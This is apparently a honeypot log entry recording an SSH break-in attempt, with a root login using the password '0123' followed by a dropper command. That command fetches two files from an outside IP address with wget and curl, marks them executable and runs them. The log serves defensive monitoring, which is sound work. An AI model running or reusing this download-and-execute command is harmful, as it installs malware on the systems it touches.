Time | 2022/06/14, 16:12:54 (GMT) |
Transaction ID | IPFIGMUUA4AYPJMG |
Service | ssh |
Location | CN (China) |
Attacker | 218.92.0.158 |
Classification | Command execution |
Harm Potential | Medium |
218.92.0.158 client username 'root' and password '0123' entered 218.92.0.158 client command : '#!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://113.160.100.172/scripts/23s curl -O http://113.160.100.172/scripts/23s chmod +x 23s ./23s wget http://113.160.100.172/scripts/23 curl -O http://113.160.100.172/scripts/23 chmod +x 23 ./23 rm -rf 23.sh'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |